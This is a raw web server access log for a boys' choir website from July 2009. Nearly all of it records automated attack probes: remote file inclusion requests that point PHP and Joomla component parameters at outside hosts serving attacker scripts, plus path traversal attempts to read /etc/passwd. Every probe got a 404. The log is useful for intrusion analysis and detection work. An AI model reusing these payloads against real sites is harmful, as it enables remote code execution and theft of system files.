195.34.78.110 - - [04/Jul/2009:10:28:13 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:30:26 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:30:31 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:10:31:52 -0700] "GET /logs/access.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:10:31:52 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:10:31:52 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:10:32:41 -0700] "GET /logs/access_090517.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:33:55 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:33:56 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:33:56 -0700] "GET /logs/access_090603.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:34:27 -0700] "GET /logs/access_090414.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
207.58.155.223 - - [04/Jul/2009:10:36:17 -0700] "GET /logs/access_090612.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:10:39:18 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:10:39:18 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:10:39:18 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:10:39:30 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:10:39:30 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:10:39:30 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
207.58.155.223 - - [04/Jul/2009:10:40:09 -0700] "GET /logs/access_090629.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:10:41:08 -0700] "GET /logs/access_090103.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:10:41:17 -0700] "GET /logs/access_090103.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:43:02 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:43:02 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:43:02 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:43:02 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:43:02 -0700] "GET /logs/access_090528.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:43:02 -0700] "GET /logs/access_090528.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:10:47:00 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:10:47:00 -0700] "GET /logs/access_090629.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:47:01 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:01 -0700] "GET /ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:01 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:03 -0700] "GET /logs/access_090626.log//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:09 -0700] "GET /ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:10 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:10 -0700] "GET /logs/access_090626.log//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:11 -0700] "GET /ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:11 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:11 -0700] "GET /logs/access_090626.log%20%20//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:20 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:23 -0700] "GET /logs/access.log%20%20//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:23 -0700] "GET /atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:23 -0700] "GET /logs//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:25 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:43 -0700] "GET /logs/access.log%20%20//ashnews.php?pathtoashnews=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:56 -0700] "GET /logs/access.log//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:56 -0700] "GET /logs//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:48:56 -0700] "GET /atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:10:49:10 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:49:31 -0700] "GET /logs/access.log//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:49:31 -0700] "GET /atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:49:32 -0700] "GET /logs//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:50:03 -0700] "GET /atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:50:03 -0700] "GET /logs//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:50:03 -0700] "GET /logs/access.log//atom.php5?page=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:56:06 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:56:07 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:10:56:08 -0700] "GET /logs/access_090629.log//agendax/addevent.inc.php?agendax_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.30.79.34 - - [04/Jul/2009:10:57:07 -0700] "GET /xxxxxxxx/?S=D HTTP/1.0" 200 650 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:10:58:48 -0700] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:10:58:48 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:10:58:49 -0700] "GET /logs/access_090414.log//inc/cmses/aedating4CMS.php?dir[inc]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:10:58:51 -0700] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:10:58:51 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:10:58:51 -0700] "GET /logs/access_090414.log//inc/cmses/aedating4CMS.php?dir[inc]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:10:59:15 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:10:59:15 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:10:59:15 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:00:24 -0700] "GET /logs/access_090414.log%20%20//inc/cmses/aedating4CMS.php?dir[inc]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:11:00:43 -0700] "GET /logs/access_090414.log%20%20//inc/cmses/aedating4CMS.php?dir[inc]=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:01:19 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:01:20 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:01:20 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:02:53 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:02:53 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:02:53 -0700] "GET /logs/access_090517.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:02:55 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:02:55 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:02:56 -0700] "GET /logs/access_090517.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:03:51 -0700] "GET /logs/access_090528.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:04:00 -0700] "GET /logs/access_090528.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:17 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:17 -0700] "GET /spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:17 -0700] "GET /logs/access.log//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:18 -0700] "GET /spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:18 -0700] "GET /logs/access.log//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:18 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:45 -0700] "GET /spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:45 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:46 -0700] "GET /logs/access.log%20%20//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:46 -0700] "GET /spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:46 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:11:04:46 -0700] "GET /logs/access.log%20%20//spaw_control.class.php?spaw_root=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:04:49 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:04:49 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:04:49 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.136.251 - - [04/Jul/2009:11:05:31 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
218.38.136.251 - - [04/Jul/2009:11:05:31 -0700] "GET /include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
218.38.136.251 - - [04/Jul/2009:11:05:31 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
218.38.136.251 - - [04/Jul/2009:11:06:40 -0700] "GET /logs/access_090318.log//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:07:46 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:07:46 -0700] "GET /logs/access_090622.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:07:46 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.136.251 - - [04/Jul/2009:11:08:10 -0700] "GET /logs/access.log%20//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
218.38.29.124 - - [04/Jul/2009:11:08:19 -0700] "GET /include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.29.124 - - [04/Jul/2009:11:08:19 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.29.124 - - [04/Jul/2009:11:08:20 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.38.29.124 - - [04/Jul/2009:11:08:24 -0700] "GET /logs/access_090318.log//include/admin.lib.inc.php?site_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:08:53 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:08:53 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:11:08:54 -0700] "GET /logs/access_090622.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:09:38 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:09:38 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
